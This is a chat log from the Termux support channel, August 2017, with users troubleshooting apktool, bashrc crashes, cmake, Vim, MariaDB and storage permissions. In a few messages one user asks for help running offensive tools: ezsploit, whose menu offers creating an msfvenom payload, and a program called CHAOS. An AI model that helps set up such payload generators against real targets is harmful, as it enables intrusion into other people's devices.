2017-08-03 12:09:31 gitter (Hax4us) WARNING: Could not write to $HOME (/data/data/com.termux/files/home/apktool/?), using /tmp instead… S: Please be aware this is a volatile directory and frameworks could go missing, please utilize –frame-path if the default storage directory is unavailable
2017-08-03 12:09:53 gitter (vishalbiswas) mkdir $HOME/apktool
2017-08-03 12:11:40 gitter (Hax4us) I have folder apktool in home directory…@vishalbiswas
2017-08-03 12:12:00 gitter (Hax4us) My app is in apktool folder
2017-08-03 12:12:13 gitter (Hax4us) And apktool.jar file also
2017-08-03 12:12:26 gitter (vishalbiswas) no java in termux
2017-08-03 12:12:42 gitter (Hax4us) But i have…
2017-08-03 12:12:53 gitter (Hax4us) Can I send screenshot
2017-08-03 12:12:56 gitter (vishalbiswas) k
2017-08-03 12:13:27 gitter (Hax4us) Is there any option in gitter app
2017-08-03 12:13:30 gitter (Hax4us) To send pic
2017-08-03 12:14:24 gitter (Hax4us) @vishalbiswas where I send bro
2017-08-03 12:15:04 gitter (vishalbiswas) imgur
2017-08-03 12:16:58 gitter (Hax4us) http://imgur.com/a/8ZLCS
2017-08-03 12:17:06 gitter (Hax4us) See bro my java version
2017-08-03 12:17:44 gitter (vishalbiswas) ok then paste the commands you used to run apktool
2017-08-03 12:18:52 gitter (Hax4us) java -jar apktool.jar d myapp.apk
2017-08-03 12:19:54 gitter (vishalbiswas) can you try to touch $HOME/apktool/?
2017-08-03 12:21:10 gitter (Hax4us) Kk..try karta hu…ohh.. :smile: srry for Hindi…
2017-08-03 12:21:25 gitter (Hax4us) U understand Hindi..?
2017-08-03 12:21:34 gitter (vishalbiswas) kuch nahi bas sab ko samajh aaye isliye english recommend karta hu
2017-08-03 12:22:23 gitter (Hax4us) Are bhai..ho tum to…kk..I can understand.. Bro..well…I m trying..and..then tell..u result
2017-08-03 12:22:23 gitter (vishalbiswas) live_the_dream: more the 2 and 1/2 years https://bugs.llvm.org/show_bug.cgi?id=23244
2017-08-03 12:28:41 gitter (Hax4us) @vishalbiswas touch $HOME/apktool/?
2017-08-03 12:28:55 gitter (Hax4us) I have to type question mark ?
2017-08-03 12:29:08 gitter (vishalbiswas) that’s what fails i think
2017-08-03 12:30:05 gitter (Hax4us) I m not getting u…bro..what r u trying to say…can u tell in easy way
2017-08-03 12:30:15 gitter (Hax4us) Plz
2017-08-03 12:30:15 gitter (vishalbiswas) yes with ?
2017-08-03 12:30:29 gitter (Hax4us) Kk
2017-08-03 12:36:01 gitter (Hax4us) Thnx bro…but one more error is coming
2017-08-03 12:36:15 gitter (Hax4us) Can I give image
2017-08-03 12:36:23 gitter (Hax4us) @vishalbiswas
2017-08-03 12:36:36 gitter (vishalbiswas) ofcourse
2017-08-03 12:37:08 gitter (Hax4us) U r great BRo..u have great helping mind..
2017-08-03 12:52:59 sdrausty IRC / Gitter bot is down
2017-08-03 12:58:36 sdrausty https://github.com/dex4er/fakechroot/blob/master/README.md
2017-08-03 13:48:53 keeger hello. trying to get reverse SSH working with termux, but i’m getting a permission denied
2017-08-03 13:49:13 keeger do i need to configure a rsa key pair to succeed?
2017-08-03 13:57:47 keeger ooh i did and it worked
2017-08-03 13:57:54 keeger huzzah!
2017-08-03 13:57:56 keeger lol
2017-08-03 14:12:18 sdrausty ssh site:termux.com
2017-08-03 14:12:30 sdrausty https://termux.com/ssh.html
2017-08-03 17:47:11 fornwall live_the_dream: I tried running cmake on a simple hello world project, using android 6.0 arm, and it worked. does cmake not run at all for you on arm? which android version?
2017-08-03 17:48:20 live_the_dream dunno its probablly on my end only
2017-08-03 17:49:21 live_the_dream it looked like it isn’t, detecting when a file is compiled.
2017-08-03 17:49:24 live_the_dream so when it does a test if compiler works it never moves..
2017-08-03 17:56:27 live_the_dream also iv gotten arm aarch64 buiilds of nodejs-current
2017-08-03 17:56:27 live_the_dream working afaik
2017-08-03 17:57:29 live_the_dream arm required an annoying hack
2017-08-03 17:57:29 live_the_dream and i am going to try x86_64 at some point today
2017-08-03 17:58:10 gitter (fornwall) @christianrondeau please create an issue about the Battery Optimizations exceptions whitelist if there isn’t one already, with as much information as possible, as I don’t remember the details what we said :)
2017-08-03 17:58:30 live_the_dream with armv7 openblas i might be able to get something could be reasonably added
2017-08-03 17:59:46 live_the_dream on openblas + fortran stuff
2017-08-03 18:00:35 fornwall android version may be relevant for the cmake problem, which version do you get the problem on?
2017-08-03 18:01:33 live_the_dream arm and arm only
2017-08-03 18:02:24 fornwall sorry, meant android version, as on android 5/6/7
2017-08-03 18:03:40 live_the_dream oh 6 / 7 if its working for you its on my end only
2017-08-03 18:07:20 fornwall well, it may be depending one something else. someone else who can try running cmake on a simple project on arm and see if it works?
2017-08-03 18:56:57 sdrausty @fornwall Thank you for fixing ~nodebot :)
2017-08-03 20:02:17 fornwall sdrausty: no problem, should really set up a monitor for it, it dies sporadically with a node.js stack trace
2017-08-03 20:03:58 fornwall sdrausty: finally the termux:boot app has been published, it should be available in google play (awaiting publication to go through) and f-droid (awaiting a pull request to be merged) shortly!
2017-08-03 20:16:40 sdrausty @fornwall This is very good news. Thank you for creating Termux:boot to all those who contributed. I have been using a short boot.sh
bash script which still suits my purposes. I give the f-droid version a try when it comes up. Do you know how to find it on f-droid? They seem to have rearranged the search feature and it seems like they lost some code and APKs in the process too.
2017-08-03 20:18:45 fornwall I think it should be available at https://f-droid.org/packages/com.termux.boot/ when ready
2017-08-03 20:18:51 sdrausty Missing source & APK https://f-droid.org/packages/io.github.mthli.Ninja/
2017-08-03 20:19:07 sdrausty THANK YOU
2017-08-03 20:19:26 fornwall I’ll put in a link to it from the README at the termux-boot repo when available
2017-08-03 20:25:09 sdrausty great
2017-08-03 20:25:42 sdrausty mount loop device filesystem
2017-08-03 20:30:47 sdrausty have you had a chance to review https://play.google.com/store/apps/details?id=com.cuntubuntu https://github.com/pelya/debian-noroot I thinck this app might have the key to the native Android space issue @fornwall
2017-08-03 20:31:17 sdrausty as far as mounting filesystems from files
2017-08-03 20:31:36 sdrausty via loop device or devices
2017-08-03 21:02:47 fornwall no, haven’t had the time yet, will look at it when I’m back from vacation next week!
2017-08-03 21:10:43 gitter (christianrondeau) @fornwall @frumpylava - I have created an issue here https://github.com/termux/termux-app/issues/377 for the “doze mode” slowing down issue (for tracking purposes). I referenced the gitter conversation that made me hopeful in it, as well the article from the Android documentation :) Thanks!
2017-08-03 21:12:42 gitter (fornwall) @christianrondeau thanks!
2017-08-03 21:23:13 sdrausty happy vacationing :) @forwall
2017-08-03 21:29:55 sdrausty please install https://github.com/pelya/debian-noroot
2017-08-03 21:30:09 sdrausty https://play.google.com/store/apps/details?id=com.cuntubuntu It magical mounts a file system. I believe it uses https://github.com/pelya/fakechroot
2017-08-03 21:32:11 sdrausty to accomplish thesought after goal of https://github.com/termux/termux-packages/issues/1176 More Native Space on Device
2017-08-03 21:58:35 gitter (sdrausty) You will want a keyboard and mouse to really enjoy Debian Noroot on device. That is one of its’ flaws.
2017-08-03 22:26:14 sdrausty magical mounts *magically mounts
2017-08-03 22:28:46 sdrausty btw is ~nodebot running in Termux on device or somewhence else?
2017-08-03 22:46:14 poyntz hi. does anyone know how to make termux launch from hero2lte@
2017-08-03 22:46:41 poyntz *make termux bash launch from
2017-08-03 22:49:35 poyntz the only way ive been able to get to hero2lte is via su which ofcourse puts you in #, but want to be in $ on hero2lte in termux bash like what happens in adb
2017-08-03 22:59:27 live_the_dream yeah do a search for “Bash PS1 prompt variable” in google
2017-08-03 23:02:04 gitter (Hax4us) @sdrausty
2017-08-03 23:04:12 gitter (Hax4us) @vishalbiswas bro..i m in very strange condition…. I dont know how..but today..when I opened TERMUX it says process completed (code 1) -press enter
2017-08-03 23:05:19 gitter (Hax4us) Whenever I trying to open termux. It says..process completed (code -1) - press enter :worried: when I enter…app closed
2017-08-03 23:13:33 gitter (vishalbiswas) @Hax4us Swipe from left, then tap and hold on new session. tap safe mode. Then remove any .bashrc
or similar files
2017-08-03 23:19:27 gitter (Hax4us) @vishalbiswas BRo.. .bashrc file is not needed. ? R u sure..? I should delete .bashrc
2017-08-03 23:20:52 gitter (Hax4us) Is it safe to delete .bashrc file ?
2017-08-03 23:23:14 gitter (Hax4us) .bashrc deleted.. Now problem is still live…and safe mode is working…
2017-08-03 23:27:28 sdrausty https://mobile.twitter.com/SDRausty/status/893311968890826752
2017-08-03 23:27:30 gitter (vishalbiswas) @Hax4us show output of ls -lah $HOME
2017-08-03 23:28:12 gitter (sdrausty) @Hax4us
2017-08-03 23:28:48 gitter (sdrausty) Is your device rooted?
2017-08-03 23:28:54 gitter (Hax4us) Yes
2017-08-03 23:29:00 gitter (Hax4us) Rooted
2017-08-03 23:29:23 gitter (Hax4us) @vishalbiswas unknown option -h aborting
2017-08-03 23:29:28 gitter (sdrausty) By whome
2017-08-03 23:29:40 gitter (vishalbiswas) then just ls -la $HOME
2017-08-03 23:31:49 gitter (Hax4us) http://imgur.com/a/bHxrj
2017-08-03 23:31:54 gitter (Hax4us) Here is output @vishalbiswas
2017-08-03 23:32:46 gitter (sdrausty) whome *whom
2017-08-03 23:32:46 gitter (sdrausty) https://www.google.com/search?q=define%3Awhom @Hax4us What is the app you rooted your device with?
2017-08-03 23:33:25 gitter (Hax4us) SuperSu @sdrausty
2017-08-03 23:35:30 gitter (vishalbiswas) @Hax4us now ls -la /data/data/com.termux/files/usr/bin/bash
2017-08-03 23:35:50 sdrausty Package requests: su, sudo, termux-make-root and termux-make-unroot are potential spin-offs. From https://github.com/termux/termux-packages/issues/1176 Thank you @Hax4us
2017-08-03 23:35:52 gitter (vishalbiswas) and why did you use root? I hope you didn’t try to install any packages using root
2017-08-03 23:36:32 sdrausty ircd rebooted my Android @vishalbiswas
2017-08-03 23:36:45 gitter (Hax4us) @vishalbiswas I m using root for install java 1.7.0 and apktool
2017-08-03 23:36:47 gitter (vishalbiswas) @sdrausty ask your loopback question here -> https://groups.google.com/forum/?fromgroups#!forum/android-platform
2017-08-03 23:38:14 gitter (Hax4us) -rwx—— u0_a236 u0_a236 704224 2017-08-02 17:42 bash
2017-08-03 23:38:16 gitter (Hax4us) It is output
2017-08-03 23:38:34 gitter (Hax4us) It is enough ? Should I send pic ?
2017-08-03 23:39:15 sdrausty thx for the lead lol
2017-08-03 23:39:20 gitter (vishalbiswas) and is there anything in /data/data/com.termux/files/usr/etc/profile.d
and paste what’s in /data/data/com.termux/files/usr/etc/profile
2017-08-03 23:41:13 gitter (Hax4us) There is no any any profile.d file and it is content of profile file
2017-08-03 23:41:23 gitter (Hax4us) for i in /data/data/com.termux/files/usr/etc/profile.d/*.sh; do
2017-08-03 23:41:23 gitter (Hax4us) if [ -r $i ]; then
2017-08-03 23:41:23 gitter (Hax4us) . $i
2017-08-03 23:41:23 gitter (Hax4us) [full message: https://gitter.im/termux/termux?at=5983ece376a757f80872adf1]
2017-08-03 23:43:06 gitter (vishalbiswas) everything looks fine to me
2017-08-03 23:43:29 gitter (vishalbiswas) there’s nothing i can do, you’ll have to reinstall termux
2017-08-03 23:44:13 gitter (Hax4us) :worried: 😶kk..bro..thnx..for help..
2017-08-03 23:46:13 sdrausty I have updated https://github.com/termux/termux-app/issues/376 Have you tried https://play.google.com/store/apps/details?id=com.cuntubuntu on unrooted device? Please do; It mounts a filesystem from file nonroot as far as I know using https://github.com/pelya/fakechroot I am requesting an opinion about Debian Noroot from the Google Play Store, and more importantly the snippets of source code from
2017-08-03 23:46:13 sdrausty https://github.com/pelya/debian-noroot and/or https://github.com/dex4er/fakechroot
2017-08-03 23:47:59 sdrausty to resolve #1176 #375 & #376 regarding more native Android space on device.
2017-08-03 23:50:06 gitter (Hax4us) Debian noroot not working in android 5.1 bcz I have
2017-08-03 23:50:47 gitter (Hax4us) It crashed each time
2017-08-03 23:55:20 sdrausty thx @Hax4us noroot on device is prerequisite https://www.google.com/search?q=define%3Aprerequisite to esting nonroot applications.
2017-08-03 23:56:46 sdrausty esting *testing thx fir your input @Hax4us
2017-08-03 23:59:11 sdrausty @Hax4us Please research bashrc site:tldp.org
The results are usually were enlightening.
2017-08-04 00:00:01 sdrausty https://duckduckgo.com/?q=bashrc+site%3Atldp.org
2017-08-04 00:14:30 sdrausty @fonwall @vishalbiswas anl everyone here Does Anyone Want to Have More Native Space on Device? · Issue #1176 · termux/termux-packages
2017-08-04 00:21:43 sdrausty Can anyone here test Debian Noroot from the Playstore so see whether it actually mounts a filesystem on device. I believe it does just like gnuroot, also available from the Google Play Store. These apps mount images from files nonroot on device. Which snippets of source code do these apps use?
2017-08-04 00:22:28 gitter (sdrausty) Please.
2017-08-04 00:53:27 gitter (themastersunil) anyone can tell me how to install tput setaf package library in termux?
2017-08-04 00:53:57 gitter (vishalbiswas) ncurses-util
2017-08-04 00:55:06 gitter (themastersunil) apt install ncurses-util
2017-08-04 00:55:06 gitter (themastersunil) Reading package lists… Done
2017-08-04 00:55:06 gitter (themastersunil) Building dependency tree
2017-08-04 00:55:06 gitter (themastersunil) [full message: https://gitter.im/termux/termux?at=5983fe291c8697534a885728]
2017-08-04 00:56:36 gitter (vishalbiswas) ncurses-utils
2017-08-04 01:00:06 gitter (themastersunil) ::::::::::::::::::::
2017-08-04 01:00:07 gitter (themastersunil) -e \E[1;33m:::\e[97m[1] \e[90mPayload \e[97m [Create a payload with msvenom] \E[1;33m
2017-08-04 01:00:07 gitter (themastersunil) tput: No value for $TERM and no -T specified
2017-08-04 01:00:07 gitter (themastersunil) [full message: https://gitter.im/termux/termux?at=5983ff5676a757f80872e323]
2017-08-04 01:00:23 gitter (themastersunil) still I’m facing this issue😰
2017-08-04 01:00:59 gitter (vishalbiswas) export TERM=xterm-256color
2017-08-04 01:01:10 gitter (vishalbiswas) inside msfconsole
2017-08-04 01:01:26 gitter (themastersunil) first I’ll install metasploit????
2017-08-04 01:01:37 gitter (vishalbiswas) you are in metasploit?
2017-08-04 01:01:52 gitter (themastersunil) nope, this is ezsploit
2017-08-04 01:12:51 gitter (themastersunil) Issue https://imgur.com/gallery/xZGPR
2017-08-04 01:12:59 gitter (themastersunil) Please check it
2017-08-04 01:15:11 gitter (vishalbiswas) echo $TERM
2017-08-04 01:15:16 gitter (vishalbiswas) what does it show?
2017-08-04 01:17:35 gitter (themastersunil) $ echo $TERM
2017-08-04 01:17:35 gitter (themastersunil) xterm-256color
2017-08-04 01:17:35 gitter (themastersunil) $
2017-08-04 01:22:27 gitter (themastersunil) 😰 $TERM environment variable not set.
2017-08-04 01:22:49 gitter (themastersunil) ??
2017-08-04 01:27:53 gitter (themastersunil) when i run ezploit…
2017-08-04 01:28:13 gitter (themastersunil) why?
2017-08-04 01:28:23 gitter (themastersunil) I’m getting this issue?
2017-08-04 02:52:34 live_the_dream ooo worked out how to cross compile nodejs-current on all archs now
2017-08-04 09:24:06 BrainDam1 hi, is there a command to set screen timeout?
2017-08-04 10:27:44 gitter (AshleyNykiel) Latest nvim installed from termux repo, latest spavevim installed from git repo, installing plugin vimfiler produces following error and crashes nvim :-(
2017-08-04 10:27:44 gitter (AshleyNykiel)
2017-08-04 10:27:44 gitter (AshleyNykiel) invalid address or address of corrupt block 0xb85be9b8 passed to dlfree
2017-08-04 10:27:44 gitter (AshleyNykiel) [full message: https://gitter.im/termux/termux?at=598484611c8697534a8a888b]
2017-08-04 11:30:46 sdrausty Why does weechat dance all over my Termux screen? Up and down, refresh. Just a moment, then refresh again and soforth. What is making weechat refresh the screen by blinking and blinking again in Termux on Android?
2017-08-04 12:23:03 gitter (AshleyNykiel) oops meant spacevim
2017-08-04 18:56:52 sdrausty ¹
2017-08-04 22:39:23 swift110-phone hey
2017-08-04 23:33:43 rods-tab3 hay
2017-08-04 23:43:55 poyntz hi. is there any way to run termux apps using tsu -s su?
2017-08-04 23:44:46 poyntz I get Permission Denied every time I call on an app in the app data library, ie. /data/data/com.termux/files/usr/bin
2017-08-04 23:45:32 poyntz tsu runs busybox commands fine, just getting permission issues on the termux commands
2017-08-04 23:46:50 poyntz (excluding make which seems to run up until it hits a permission error when it calls /bin/su (which doesn’t exist), and putting the su symlink into /bin didn’t fix anything :(
2017-08-04 23:48:05 poyntz running tsu -s sh didn’t work either - just got permission denied on every command under sh
2017-08-04 23:50:29 poyntz reason I’m using tsu is because su doesn’t have the make command (termux command)
2017-08-05 00:48:37 gitter (themastersunil) $ starfedora
2017-08-05 00:48:37 gitter (themastersunil) starfedora: command not found $ startfedora
2017-08-05 00:48:37 gitter (themastersunil) [termux@fedora termux-fedora]$ dnf update
2017-08-05 00:48:51 gitter (themastersunil) dnf update not working
2017-08-05 00:49:03 gitter (themastersunil) Please help
2017-08-05 03:54:04 Regenaxer Hi all! Since I few weeks I observe in Vim on Termux an annoying delay in shift-left commands (via ‘<’). Does anybody know the reason?
2017-08-05 04:51:49 live_the_dream b31
2017-08-05 04:51:49 live_the_dream fuck me…
2017-08-05 05:53:53 gitter (themastersunil) https://imgur.com/gallery/BivL2 anyone solve this issue???
2017-08-05 05:57:50 gitter (themastersunil) ??
2017-08-05 05:57:50 gitter (themastersunil) ?
2017-08-05 06:19:07 gitter (themastersunil) $ ./start.sh
2017-08-05 06:19:07 gitter (themastersunil) proot warning: can’t chdir(“/root/.”) in the guest rootfs: No such file or directory
2017-08-05 06:19:07 gitter (themastersunil) proot info: default working directory is now “/”
2017-08-05 06:19:07 gitter (themastersunil) [full message: https://gitter.im/termux/termux?at=59859b9b614889d4751e8c3c]
2017-08-05 06:23:47 endre it’s because of a bad shebang
2017-08-05 06:24:20 endre there’s a termux script to fix shebangs in other scripts
2017-08-05 06:32:44 gitter (themastersunil) which script????
2017-08-05 06:32:46 gitter (themastersunil) Tell me???
2017-08-05 06:50:20 gitter (themastersunil) apt install coreutils
2017-08-05 07:07:03 gitter (themastersunil) README.md start.sh ubuntu-fs ubuntu.sh
2017-08-05 07:07:03 gitter (themastersunil) $ ./start.sh
2017-08-05 07:07:03 gitter (themastersunil) proot warning: can’t chdir(“/root/.”) in the guest rootfs: No such file or directory
2017-08-05 07:07:03 gitter (themastersunil) [full message: https://gitter.im/termux/termux?at=5985a6d6210ac26920571cdb]
2017-08-05 07:07:10 gitter (themastersunil) Please solve
2017-08-05 08:04:21 gitter (AshleyNykiel) termux-fix-shebang
2017-08-05 08:42:30 gitter (themastersunil) $ ls
2017-08-05 08:42:30 gitter (themastersunil) README.md start.sh ubuntu-fs ubuntu.sh
2017-08-05 08:42:30 gitter (themastersunil) $ ./start.sh
2017-08-05 08:42:30 gitter (themastersunil) [full message: https://gitter.im/termux/termux?at=5985bd36c101bc4e3aeecebf]
2017-08-05 12:15:05 Regenaxer Hi all! Since I few weeks I observe in Vim on Termux an annoying delay in shift-left commands (via ‘<’). Does anybody know the reason?
2017-08-05 12:15:27 Regenaxer It is only on the Termux version of Vim as far as I can see
2017-08-05 12:16:02 Regenaxer eg 3« should shift immediately, no need to wait for one second as the command is complete
2017-08-05 12:16:27 Regenaxer This happens with any combination of ‘<’
2017-08-05 12:16:55 Regenaxer eg. <}
2017-08-05 12:26:08 Grimler Regenaxer: open an issue at github: https://github.com/termux/termux-packages
2017-08-05 12:26:16 Grimler Regenaxer*
2017-08-05 12:27:00 Regenaxer Thanks, I thought maybe someone here uses Vim too
2017-08-05 12:27:35 Regenaxer Seems not the case?
2017-08-05 12:30:05 Regenaxer Another question: Are the key shortcuts in .termux/termux.properties documented somewhere? I use some since a long time, but I cannot find them documented ;)
2017-08-05 12:30:24 Grimler Not me anyways. Could you explain a bit how to reproduce the erroneous behaviour? Should I just open vim, write some stuff and then do :3« to have it lag?
2017-08-05 12:31:14 Regenaxer yes, but not in the : command
2017-08-05 12:31:26 Grimler in insert mode?
2017-08-05 12:31:41 Regenaxer ‘<’ shifts left, so it must be on a line which is indented
2017-08-05 12:31:47 Regenaxer no, in command mode
2017-08-05 12:31:56 Regenaxer The easiest is just «
2017-08-05 12:32:05 Regenaxer shifts the current line left
2017-08-05 12:32:20 Grimler There’s some documentation here: https://termux.com/configuration.html but maybe you knew that already
2017-08-05 12:32:42 Regenaxer yes, right
2017-08-05 12:33:12 Regenaxer there are also key shortcuts, like shortcut.create-session
2017-08-05 12:33:46 Regenaxer iirc fornwall told me them directly back then
2017-08-05 12:34:02 Regenaxer Now I wonder if there are more of them
2017-08-05 12:34:43 Regenaxer Currently I have these three:
2017-08-05 12:34:54 Regenaxer shortcut.create-session = Ctrl + O
2017-08-05 12:34:54 Regenaxer shortcut.previous-session = Ctrl + P
2017-08-05 12:34:54 Regenaxer shortcut.next-session = Ctrl + N
2017-08-05 12:35:57 Grimler Cool, I didn’t know about this!
2017-08-05 12:36:31 Regenaxer yes, would be good to be documented then :)
2017-08-05 12:37:10 Regenaxer My desire would be one more, eg. shortcut.toggle-session = Ctrl + Y
2017-08-05 12:37:34 Regenaxer to switch quickly between the last two windows
2017-08-05 12:38:00 Regenaxer So I wondered perhaps there is already something along that line
2017-08-05 12:40:58 Grimler I’m not experiencing any delays when using :« in vim on my device (if I’m doing it correctly)
2017-08-05 12:41:36 Regenaxer ok, good to know. Perhaps it is a local problem
2017-08-05 12:41:46 Regenaxer thanks for the test!
2017-08-05 12:42:08 Regenaxer And thanks for the github idea
2017-08-05 12:42:20 Grimler TermuxPreferences.java seem to be the file to look in for the shortcuts: https://github.com/termux/termux-app/blob/master/app/src/main/java/com/termux/app/TermuxPreferences.java seems to only be four of them
2017-08-05 12:42:36 Grimler yeah np
2017-08-05 12:43:10 Grimler the vim problem might be dependent on android version
2017-08-05 12:43:51 Regenaxer yes, and “shortcut.rename-session”
2017-08-05 12:44:11 Grimler exactly
2017-08-05 12:44:12 Regenaxer I don’t think it could depend on Android
2017-08-05 12:44:34 Regenaxer ok, so from the source we see there are not more
2017-08-05 12:45:05 Regenaxer Whe Vim thing must be a config issue
2017-08-05 12:45:47 Regenaxer Some commands like ‘g’ expect further arguments, so they may wait, but for ‘<’ this is not the case
2017-08-05 12:46:01 Regenaxer ‘>’ ‘»’ etc is immediate too
2017-08-05 12:46:20 Regenaxer Perhaps a change in Vim
2017-08-05 12:46:33 Regenaxer some command extension
2017-08-05 12:46:57 Regenaxer Termux always has new versions of everything, which is awesome
2017-08-05 12:47:20 Grimler Truely is awesome :)
2017-08-05 12:48:08 Grimler Is there some debug mode for vim with which you can run it with default config? Could be useful to determine if the problem is related to your config
2017-08-05 12:48:52 Regenaxer yes, I don’t remember atm though
2017-08-05 13:06:59 frumpylava As someone who never did android development, what would I need to do to compile Termux:API? I want to see if I can implement a few more commands. termux-volume-[s|g]et
would be soo cool. The code doesn’t seem that complicated.
2017-08-05 13:10:28 gitter (vishalbiswas) get android studio, open project, it will automatically download all required deps
2017-08-05 13:20:59 frumpylava @vishalbiswas thanks. I will try that.
2017-08-05 13:21:51 frumpylava By the way, I put “termux-mpd-notifications” on github. https://github.com/Neo-Oli/termux-mpd-notifications It does the same as my previos program did for mpv, but for mpd. It displays notifications in the status bar about the playing music.
2017-08-05 13:37:35 frumpylava Oh wait, will I need to compile the main termux app as well? Do the apks need to be signed by the same key?
2017-08-05 14:10:23 gitter (AshleyNykiel) Are you able to change the MariaDB socket path and name to something like /data/data/com.termux/files/var/run/mysql/mysql.sock, my PID file already lives in that directory as mysql.pid, though I made the necessary changes in my.cnf but it still puts the socket file in ../var/tmp, suggestions?
2017-08-05 15:49:25 frumpylava If only my phone had GPIO pins…
2017-08-05 15:50:54 rods-tab3 get a PI 3 and install android 8 – its got mucho pins
2017-08-05 16:05:05 frumpylava rods-tab3: I’ve been thinking of building my own phone with a raspberry pi zero. It would still have to serve as my regular day phone.
2017-08-05 16:06:34 rods-tab3 does a raspberry have a phone modem ?
2017-08-05 16:10:39 frumpylava no. but there are projects like the piphone that add it
2017-08-05 16:29:58 rods-tab3 It is possible to home-build a phone from open hardware and software.[9][10] The Arduinophone[10] (touchscreen) and the MIT DIY Cellphone (segmented display)[11][12] both use the Arduino open-hardware single-board computer, with added components. The PiPhone[13] and ZeroPhone[14] are similar, but based on the Raspberry Pi.
2017-08-05 16:29:59 rods-tab3 https://en.m.wikipedia.org/wiki/List_of_open-source_mobile_phones
2017-08-05 17:01:25 rods-tab3 the world has gone to the Dogs http://www.davidhunt.ie/pi-rex-bark-activated-door-opening-system-with-raspberry-pi/
2017-08-05 17:02:53 rods-tab3 there should be an app termux-bark-detect
2017-08-05 20:40:58 gitter (AshleyNykiel) MariaDB - ERROR 2059 (HY000): Plugin unix_socket could not be loaded: dlopen failed: library “/data/data/com.termux/files/usr/lib/mysql/plugin/unix_socket.so” not found
2017-08-05 21:48:38 poyntz hi. is there any way to run termux commands through tsu? (termux wrapper dor bash & su)? su commands work, termux get permission denied
2017-08-05 22:59:20 gitter (Ashish882) Hi
2017-08-05 23:04:28 gitter (Thatguy1114) How do you setup dotfiles?
2017-08-06 01:45:49 gitter (vishalbiswas) @AshleyNykiel use --socket=<filename>
option or add your changes to ~/.my.cnf
2017-08-06 01:46:12 gitter (vishalbiswas) /etc/my.cnf
or /etc/mysql/my.cnf
are not read
2017-08-06 01:48:27 gitter (vishalbiswas) @Thatguy1114 just like any linux distro
2017-08-06 01:48:56 gitter (Thatguy1114) Thanks.
2017-08-06 05:07:55 mrjpaxton Hey, I’m trying to run Weechat in termux, and I’m getting TLS certificate errors. Freenode uses Let’s Encrypt, and apparently Termux does not have access to the path for these. I also tried installing ca-certificates, but to my understanding, those don’t have the Let’s Encrypt CA certs.
2017-08-06 05:45:06 QuerkyBren hi
2017-08-06 05:45:30 QuerkyBren i need help with using termux
2017-08-06 05:48:39 QuerkyBren hi
2017-08-06 05:54:29 live_the_dream ?
2017-08-06 06:16:52 QuerkyBren i need help with termux
2017-08-06 06:19:54 live_the_dream >
2017-08-06 06:19:54 live_the_dream what do you needD
2017-08-06 06:23:33 QuerkyBren i cant run a c file
2017-08-06 06:23:35 QuerkyBren i do e.g ./a.out
2017-08-06 06:23:47 QuerkyBren and it says “permission denied”
2017-08-06 06:29:50 gitter (vishalbiswas) QuerkyBren: you can only execute programs on your $HOME dir
2017-08-06 06:33:26 QuerkyBren why
2017-08-06 06:39:08 Grimler QuerkyBen: because of android, see for example https://android.stackexchange.com/questions/35658/adb-permission-denied-to-run-a-configure-file
2017-08-06 06:45:18 live_the_dream its android security model
2017-08-06 07:45:33 gitter (Auxilus) Can I use image as background for Termux ?
2017-08-06 07:54:10 gitter (Auxilus) @vishalbiswas i think if we use --depth 1
we get error for newly added gem dependencies in my script
2017-08-06 10:03:16 gitter (spences10) Hi, how do I set up storage so I don’t get permission errors using npm?
2017-08-06 10:04:33 gitter (Auxilus) termux-setup-storage
2017-08-06 10:08:32 gitter (spences10) Should it look like this now?
2017-08-06 10:08:32 gitter (spences10) LD_LIBRARY_PATH=/data/data/com.termux/files/usr/lib
2017-08-06 10:08:32 gitter (spences10) LANG=en_US.UTF-8
2017-08-06 10:08:32 gitter (spences10) [full message: https://gitter.im/termux/termux?at=598722e0329651f46ef5b7c5]
2017-08-06 10:09:07 gitter (spences10) Sorry about code wall
2017-08-06 10:11:18 gitter (spences10) I’m still getting permission errors?
2017-08-06 10:48:03 alphacode567 hello
2017-08-06 10:55:39 alphacode567 anyone here
2017-08-06 11:49:34 gitter (themastersunil) which script????
2017-08-06 11:49:35 gitter (themastersunil) Tell me???
2017-08-06 11:49:35 gitter (themastersunil)
2017-08-06 11:49:35 gitter (themastersunil) [full message: https://gitter.im/termux/termux?at=59873a8e2723db8d5e7d0a75]
2017-08-06 13:07:43 gitter (AshleyNykiel) @vishalbiswas Ive fixed the my.cnf socket path and name issue, now the problem is there is no file (plugin) named unix_socket.so anywhere?
2017-08-06 13:08:23 gitter (AshleyNykiel) @themastersunil termux-fix-shebang
2017-08-06 13:15:04 gitter (AshleyNykiel) @themastersunil Oops meant termux-fix-shebang start.sh ubuntu.sh
2017-08-06 15:01:19 gitter (vishalbiswas) @AshleyNykiel when do you get that error and what is its purpose?
2017-08-06 15:14:28 gitter (AshleyNykiel) @vishalbiswas The Unix_Socket authentication plugin allows users to use OS credentials to connect to MariaDB via Unix socket. The Unix_Socket authentication plugin only works when your Linux OS and MariaDB have a user account with the same username. With he Unix_Socket authentication plugin installed I can log into MariaDB monitor as user u0_a84 without typing password because I already logged into Termux as user u0_a84.
2017-08-06 15:30:41 gitter (TiberiumN) Hi guys! recently https://github.com/nim-lang/Nim/pull/5772 was merged in Nim language (it added full support for android via termux). Is it hard to make a termux package? nim has it’s own build script (to build Nim out of pregenerated C sources)
2017-08-06 15:34:37 gitter (TiberiumN) does termux docker image cross-compile all packages?
2017-08-06 17:10:12 gitter (fornwall) @TiberiumN yes, all packages are cross-compiled! See https://github.com/termux/termux-packages/blob/master/README.md to learn more
2017-08-06 17:32:49 gitter (AshleyNykiel) @vishalbiswas here is more info regarding the unix_socket plugin: https://mariadb.com/kb/en/mariadb/unix_socket-authentication-plugin/
2017-08-06 18:25:47 live_the_dream fornwall: im thinking it might be possible to have a termux android distro to run in emulator for builds….
2017-08-06 18:25:47 live_the_dream the issue is of course that aarch64 would be slow as shit
2017-08-06 21:34:40 poyntz hi. how are things?
2017-08-06 21:36:33 poyntz is there a way to open an app at the command line using termux? for e.g, in bash/OSX open -a
2017-08-06 21:38:40 poyntz keen to nominate the app for certain filetypes b/c termux seems to default the app chooser for .bashrc, .profile, etc. files to archive apps instead of the text editors ones
2017-08-07 02:05:45 gitter (themastersunil) $ ls
2017-08-07 02:05:45 gitter (themastersunil) CHAOS.go LICENSE README.md content
2017-08-07 02:05:45 gitter (themastersunil) $ go run CHAOS.go
2017-08-07 02:05:45 gitter (themastersunil) [!] OS not supported!
2017-08-07 02:09:53 gitter (themastersunil) $ cd termux-ubuntu
2017-08-07 02:09:53 gitter (themastersunil) $ ls
